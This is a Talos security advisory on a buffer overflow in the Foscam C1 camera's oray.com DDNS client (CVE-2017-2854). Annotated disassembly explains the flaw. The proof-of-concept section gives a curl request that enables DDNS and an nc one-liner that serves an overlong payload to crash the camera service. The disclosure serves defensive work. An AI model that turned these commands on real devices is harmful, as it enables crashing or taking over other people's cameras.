Talos Vulnerability Report

TALOS-2017-0357

Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability

November 13, 2017
CVE Number

CVE-2017-2854

Summary

An exploitable buffer overflow vulnerability exists in the DDNS client used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.43. On devices with DDNS enabled, an attacker who is able to intercept HTTP connections will be able to fully compromise the device by creating a rogue HTTP server.

Tested Versions

Foscam Indoor IP Camera C1 Series
System Firmware Version: 1.9.3.18
Application Firmware Version: 2.52.2.43
Plug-In Version: 3.3.0.26

Product URLs

http://www.foscam.com/downloads/index.html

CVSSv3 Score

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Details

Foscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the arm architecture. Foscam is considered one of the most common security cameras out on the current market.

The device can be configured to use a DDNS client to associate to a hostname the public IP address of the network hosting the camera. Clients have to be configured via the web interface by choosing between one of the supported DDNS providers together with a hostname, username and password. When the "webService" process starts it creates several threads, one of them is the "DDNS update thread", function ThreadEntry_DdnsUpdate. At [1] r0 contains the seconds elapsed since the last loop execution. Every 10 seconds [2], the function retrieves the public IP address [3] and if it detects a difference the new IP is updated [4]. The function getMyGloableIp takes a pointer to the global structure at 0xa8074 as parameter [5]. This structure is located in the .bss segment and has a size of 140 bytes.

...                        ThreadEntry_DdnsUpdate
...
.text:00051BC4 09 00 50 E3      CMP     R0, #9                ; [1]
.text:00051BC8 00 00 A0 D3      MOVLE   R0, #0
.text:00051BCC 01 00 A0 C3      MOVGT   R0, #1
.text:00051BD0 00 00 50 E3      CMP     R0, #0                ; [2]
.text:00051BD4 12 00 00 0A      BEQ     loc_51C24
.text:00051BD8 04 00 A0 E1      MOV     R0, R4                ; [5]
.text:00051BDC 8B FF FF EB      BL      getMyGloableIp        ; [3]
.text:00051BE0 00 00 50 E3      CMP     R0, #0
.text:00051BE4 0C 00 00 0A      BEQ     loc_51C1C
...
.text:00051C5C 04 00 A0 E1      MOV     R0, R4
.text:00051C60 CB FE FF EB      BL      sub_51794             ; [4]

The function getMyGloableIp, checks if the configured hostname is not empty [6], then it retrieves the "ddnsServer" which is currently set [7]: this is a number between 0 and 5. 0 means that no DDNS is set [8], and retrieving the public IP address with DDNS number 3 is not supported [9]. Using this index, another function is called [10] that returns the "ddnsServer" instance (using a singleton pattern). The function responsible for retrieving the public IP address is then called [11], passing as arguments the "ddnsServer" instance and a buffer for storing the IP address [12]. This buffer starts at offset 0x58 in the global structure at 0xa8074. Note that for every provider a different function is used to retrieve the public IP address.

.text:00051A10             getMyGloableIp
...
.text:00051A20 00 40 A0 E1      MOV     R4, R0
...
.text:00051A28 08 30 90 E5      LDR     R3, [R0,#8]
.text:00051A2C 00 30 D3 E5      LDRB    R3, [R3]
.text:00051A30 00 00 53 E3      CMP     R3, #0               ; [6]
.text:00051A34 34 00 00 1A      BNE     loc_51B0C
...
.text:00051A44 30 00 00 EA      B       loc_51B0C
.text:00051A48
.text:00051A48             loc_51A48
.text:00051A48 30 10 94 E5      LDR     R1, [R4,#0x30]
.text:00051A4C 34 20 94 E5      LDR     R2, [R4,#0x34]
.text:00051A50 C8 30 9F E5      LDR     R3, =sub_51D20
.text:00051A54 BF F0 FF EB      BL      sub_4DD58            ; [10]
.text:00051A58 58 50 84 E2      ADD     R5, R4, #0x58
.text:00051A5C 05 10 A0 E1      MOV     R1, R5               ; [12]
.text:00051A60 00 30 90 E5      LDR     R3, [R0]
.text:00051A64 00 30 93 E5      LDR     R3, [R3]
.text:00051A68 33 FF 2F E1      BLX     R3                   ; [11]
...
.text:00051B00             loc_51B00
.text:00051B00 00 00 A0 E3      MOV     R0, #0
.text:00051B04 14 D0 8D E2      ADD     SP, SP, #0x14
.text:00051B08 30 80 BD E8      LDMFD   SP!, {R4,R5,PC}
.text:00051B0C
.text:00051B0C             loc_51B0C
.text:00051B0C 0C 00 94 E5      LDR     R0, [R4,#0xC]        ; [7]
.text:00051B10 03 00 50 E3      CMP     R0, #3               ; [9]
.text:00051B14 00 00 50 13      CMPNE   R0, #0               ; [8]
.text:00051B18 F8 FF FF 0A      BEQ     loc_51B00
.text:00051B1C C9 FF FF EA      B       loc_51A48

When the DDNS provider in use is "oray.com" (DDNS number 1), the function sub_4E460 is called. This function calls sub_53808 [13] to establish a connection with "ddns.oray.com" on port 80. An HTTP request is built [14] and sent to the socket by calling CDdnsClient__readyToSend [15]. The response from the remote server is then retrieved using CDdnsClient__readyToRead [16], which will read at most 1024 bytes [17].

.text:0004E460             sub_4E460
.text:0004E460
.text:0004E460 F0 40 2D E9      STMFD   SP!, {R4-R7,LR}
.text:0004E464 C1 DE 4D E2      SUB     SP, SP, #0xC10
.text:0004E468 0C D0 4D E2      SUB     SP, SP, #0xC
.text:0004E46C 00 40 A0 E1      MOV     R4, R0
.text:0004E470 C1 0E 8D E2      ADD     R0, SP, #0xC30+var_20
.text:0004E474 04 00 80 E2      ADD     R0, R0, #4
.text:0004E478 01 50 A0 E1      MOV     R5, R1
...
.text:0004E4A0 00 30 94 E5      LDR     R3, [R4]
.text:0004E4A4 03 1B 8D E2      ADD     R1, SP, #0xC30+var_30
.text:0004E4A8 10 C0 93 E5      LDR     R12, [R3,#0x10]
.text:0004E4AC 04 00 A0 E1      MOV     R0, R4
.text:0004E4B0 0C 10 81 E2      ADD     R1, R1, #0xC             ; "ddns.oray.com"
...
.text:0004E4BC 3C FF 2F E1      BLX     R12                      ; [13]
...
.text:0004E4D8 C1 0E 8D E2      ADD     R0, SP, #0xC30+var_20
.text:0004E4DC 04 00 80 E2      ADD     R0, R0, #4
.text:0004E4E0 D0 11 9F E5      LDR     R1, =aGetCheckipHttp     ; "GET /checkip HTTP/1.1\r\n"
.text:0004E4E4 2C 12 FF EB      BL      _ZNSspLEPKc
.text:0004E4E8 C1 0E 8D E2      ADD     R0, SP, #0xC30+var_20
.text:0004E4EC 04 00 80 E2      ADD     R0, R0, #4
.text:0004E4F0 C4 11 9F E5      LDR     R1, =aAccept             ; "Accept: */*\r\n"
.text:0004E4F4 28 12 FF EB      BL      _ZNSspLEPKc
.text:0004E4F8 C1 0E 8D E2      ADD     R0, SP, #0xC30+var_20
.text:0004E4FC 04 00 80 E2      ADD     R0, R0, #4
.text:0004E500 B8 11 9F E5      LDR     R1, =aUserAgentFosca     ; "User-Agent: Foscam ipcam\r\n"
.text:0004E504 24 12 FF EB      BL      _ZNSspLEPKc
.text:0004E508 C1 0E 8D E2      ADD     R0, SP, #0xC30+var_20
.text:0004E50C 04 00 80 E2      ADD     R0, R0, #4
.text:0004E510 AC 11 9F E5      LDR     R1, =aHostDdns_oray_     ; "Host: ddns.oray.com\r\n"
.text:0004E514 20 12 FF EB      BL      _ZNSspLEPKc
.text:0004E518 C1 0E 8D E2      ADD     R0, SP, #0xC30+var_20
.text:0004E51C 04 00 80 E2      ADD     R0, R0, #4
.text:0004E520 A0 11 9F E5      LDR     R1, =(asc_8D92C+2)       ; "\r\n"
.text:0004E524 1C 12 FF EB      BL      _ZNSspLEPKc
.text:0004E528 0C 00 8D E2      ADD     R0, SP, #0xC30+dest
.text:0004E52C 14 1C 9D E5      LDR     R1, [SP,#0xC30+src]
.text:0004E530 95 14 FF EB      BL      strcpy                   ; [14]
.text:0004E534 00 30 94 E5      LDR     R3, [R4]
.text:0004E538 C1 0E 8D E2      ADD     R0, SP, #0xC30+var_20
.text:0004E53C 04 00 80 E2      ADD     R0, R0, #4
.text:0004E540 14 70 93 E5      LDR     R7, [R3,#0x14]
.text:0004E544 10 6C 9D E5      LDR     R6, [SP,#0xC30+var_20]
.text:0004E548 FA 12 FF EB      BL      _ZNKSs6lengthEv
.text:0004E54C 00 30 A0 E1      MOV     R3, R0
.text:0004E550 06 10 A0 E1      MOV     R1, R6
.text:0004E554 04 00 A0 E1      MOV     R0, R4
.text:0004E558 0C 20 8D E2      ADD     R2, SP, #0xC30+dest
.text:0004E55C 37 FF 2F E1      BLX     R7                       ; [15]
...
.text:0004E58C 01 3B A0 E3      MOV     R3, #0x400               ; [17]
.text:0004E590 3C FF 2F E1      BLX     R12                      ; [16]

The function then ensures that the string "200 OK" is present anywhere in the response [18] and then finds the string "Current IP Address:" [19]. After this string the function expects to find the IP address. From this point every character is copied in the buffer passed to the function [20] using a loop, which will only exit when the character "<" [21] is found. Since the size of the destination buffer is not taken into account, a malicious HTTP server could exploit this vulnerability to write out of bounds.

.text:0004E594 00 00 50 E3      CMP     R0, #0
.text:0004E598 05 00 00 CA      BGT     loc_4E5B4
...
.text:0004E5B4             loc_4E5B4
.text:0004E5B4 02 6B 8D E2      ADD     R6, SP, #0xC30+var_430
.text:0004E5B8 0C 60 86 E2      ADD     R6, R6, #0xC
.text:0004E5BC 06 00 A0 E1      MOV     R0, R6
.text:0004E5C0 0C 11 9F E5      LDR     R1, =str.200OK           ; [18]
.text:0004E5C4 98 13 FF EB      BL      strstr
.text:0004E5C8 00 00 50 E3      CMP     R0, #0
.text:0004E5CC 09 00 00 1A      BNE     loc_4E5F8
...
.text:0004E5F8             loc_4E5F8
.text:0004E5F8 06 00 A0 E1      MOV     R0, R6
.text:0004E5FC E0 10 9F E5      LDR     R1, =aCurrentIpAdd_1     ; "Current IP Address:"
.text:0004E600 89 13 FF EB      BL      strstr                   ; [19]
.text:0004E604 00 00 50 E3      CMP     R0, #0
.text:0004E608 01 00 00 1A      BNE     loc_4E614
.text:0004E60C 09 00 00 EA      B       loc_4E638
.text:0004E610
.text:0004E610             loc_4E610
.text:0004E610 01 30 45 E5      STRB    R3, [R5,#-1]             ; [20]
.text:0004E614
.text:0004E614             loc_4E614
.text:0004E614 13 30 D0 E5      LDRB    R3, [R0,#0x13]
.text:0004E618 05 20 A0 E1      MOV     R2, R5
.text:0004E61C 3C 00 53 E3      CMP     R3, #0x3C                ; [21]
.text:0004E620 01 50 85 E2      ADD     R5, R5, #1
.text:0004E624 01 00 80 E2      ADD     R0, R0, #1
.text:0004E628 F8 FF FF 1A      BNE     loc_4E610
.text:0004E62C 00 50 A0 E3      MOV     R5, #0
.text:0004E630 00 50 C2 E5      STRB    R5, [R2]
.text:0004E634 03 00 00 EA      B       loc_4E648

Exploit Proof-of-Concept

Prerequisite for this attack is that the device is setup to use the DDNS number 1. For this, the following query can be used:

```
$ sUsr="admin"
$ sPwd=""
$ curl "http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}
&cmd=setDDNSConfig&isEnable=1&hostName=x&ddnsServer=1&user=x&password=x"
```

To trigger the vulnerability, an attacker needs to be able to intercept the device's HTTP requests and answer with a malicious payload. The following command will make the service crash.

```
$ sudo nc -l -p 80 <<< $( python2 -c 'print "200 OK Current IP Address:"+"A"*900+"<"' )
```

Timeline

2017-07-17 - Vendor Disclosure
2017-11-13 - Public Release

Credit

Discovered by Claudio Bozzato and another member of Cisco Talos.